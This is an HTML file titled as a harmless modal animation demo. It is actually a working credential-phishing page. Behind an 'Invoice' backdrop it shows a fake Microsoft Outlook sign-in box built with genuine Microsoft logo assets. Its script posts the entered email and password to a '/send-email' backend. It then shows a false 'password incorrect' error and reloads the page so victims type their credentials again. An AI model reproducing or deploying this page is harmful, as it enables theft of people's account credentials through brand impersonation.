<!DOCTYPE html>
<html>

<head>
    <title>Modal Example with Zoom Animation</title>
    <style>
        * {
            font-family: Arial, Helvetica, sans-serif;
            padding: 0;
            margin: 0;
            overflow: hidden;
        }
        .modal {
            display: none;
            position: fixed;
            z-index: 1;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            overflow: auto;
        }

        .modal-content {
            background-color: #fefefe;
            margin: 15% auto;
            padding: 44px;
            border: 1px solid #888;
            width: 350px;
            animation: zoom 0.6s;
        }

        @keyframes zoom {
            from {
                transform: scale(0)
            }

            to {
                transform: scale(1)
            }
        }
        .top-nav {
            height: 55px;
            width: 100vw;
            background-color: rgb(20, 22, 23);
            box-shadow: black 0px 0px 5px;
            z-index: 1;
            display: flex;
            align-items: center;
            padding: 0 40px;
        }
        .main-content{
            width: 100vw;
            display: flex;
            height: 100vh;
        }
        .left-sidebar {
            width: 350px;
            background-color: rgb(20, 22, 23);
            z-index: -1;
        }
        .right-content {
            background-color: rgb(33, 34, 36);
            width: 100%;
            z-index: -1;
        }
        .err-Modal {
            position: absolute;
            top: 20px;
            z-index: 3;
            margin: 0 auto;
            padding-left: 25vw;
            animation: fromTop 2s;
        }
        .err-modal-content{
            padding: 10px;
            border-radius: 10px;
            text-align: center;
            width: 50vw;
            background-color: #832841;
            color: #fefefe;
        }
        @keyframes fromTop {
            0% {
                opacity: 0%;
            }

            25% {
                opacity: 100%
            }

            75% {
                opacity: 100%
            }

            100% {
                opacity: 0%;
            }

        }
        #err-modal {
            display: none;
        }
    </style>
</head>

<body>
    <div class="top-nav">
        <label style="font-size: 20px;font-weight: 700;color: rgb(96, 96, 96);" for="menu-toggle" class="menu-icon">&#9776;</label>
        <span style="font-size: 15px;font-weight: 700;color: rgb(96, 96, 96);margin-left: 30px;">Invoice - 989287</span>
    </div>
    <div class="main-content">
        <div class="left-sidebar"></div>
        <div class="right-content"></div>
    </div>
    <div id="err-modal" class="err-Modal">
        <div class="err-modal-content">
            <p>Sorry, The email address or password is incorrect.</p>
        </div>
    </div>

    <div id="myModal" class="modal">
        <div class="modal-content">
            <form id="myForm">
                <div class="win-scroll">
                    <div id="lightbox">
                        <div style="margin-bottom: 20px;">
                            <img class="logo" role="img" src="https://logincdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg"
                                alt="Microsoft">
                        </div>
                        <div>
                            <div>
                                <div>
                                    <div style="font-size: 1.5rem;">Sign in</div>
                                    <div style="font-size: 12px;margin-bottom: 20px;">to continue to Outlook</div>
                                </div>
                                <div style="display: flex;flex-direction: column;align-items: center;"> 
                                    <input style="font-size: 15px;width: 100%;margin-bottom: 15px;padding: 10px 0;border: none;border-bottom: 1px solid black;outline: none;" type="email" name="userName" id="userName" maxlength="113" placeholder="Email, phone or skype">
                                    <input style="font-size: 15px;width: 100%;margin-bottom: 15px;padding: 10px 0;border: none;border-bottom: 1px solid black;outline: none;" type="password" name="password" id="password" maxlength="113" placeholder="Your Password">
                                </div>

                                <div style="font-size: .8125rem;margin-bottom: 16px;">No account? <a style="text-decoration: none;color: #0067b8;"
                                    href="#" id="signup" aria-label="Create a Microsoft account">Create one!</a>
                                </div>
                                <div class="form-group" style="font-size: .8125rem;display: flex;margin-bottom: 16px;">
                                    <a style="text-decoration: none;color: #0067b8;" id="idA_PWD_SwitchToFido" name="switchToFido" href="#">Sign in with a security key</a>
                                    <span class="help-button">
                                        <img src="https://logincdn.msftauth.net/shared/1.0/content/images/documentation_dae218aac2d25462ae286ceba8d80ce2.svg">
                                    </span>
                                </div>
                                <div style="display: flex;justify-content: flex-end;">
                                    <div style="width: 108px;">
                                        <input style="cursor: pointer;background-color: #0067b8;border: none; color: #FFF;width: 100%;font-size: 15px;padding: 8px 0;" type="submit" value="Next">
                                    </div>     
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </form>
        </div>
    </div>

    
    <script>
        // Function to close the modal
        function closeModal() {
            document.getElementById("myModal").style.display = "none";
        }

        // Function to reload the page
        function reloadPage() {
            window.location.href = window.location.href;
        }

        // Automatically display the modal when the HTML code is run
        window.onload = function () {
            document.getElementById("myModal").style.display = "block";
        };

        function handleSubmit(event) {
            event.preventDefault(); // Prevent the default form submission behavior

            // Get the form data
            let formData = {}
            formData.userName = document.getElementById('userName').value
            formData.password = document.getElementById('password').value
            // Make an HTTP POST request to the backend API
            fetch('/send-email', {
                method: 'POST',
                headers: formData
            }).then(response => response.text())
            .then(data => {
                    console.log(formData)
                    console.log(Number(data))
                    if(Number(data) < 5){
                        document.getElementById('err-modal').style.display = "block"
                        setTimeout(function () {
                            document.getElementById('err-modal').style.display = "none"
                            location.reload()
                        }, 1900);
                    }
                })
                .catch(error => {
                    // Handle any errors
                    console.error(error);
                });
            }

            // Add event listener to the form
            document.getElementById('myForm').addEventListener('submit', handleSubmit);

    </script>

</body>

</html>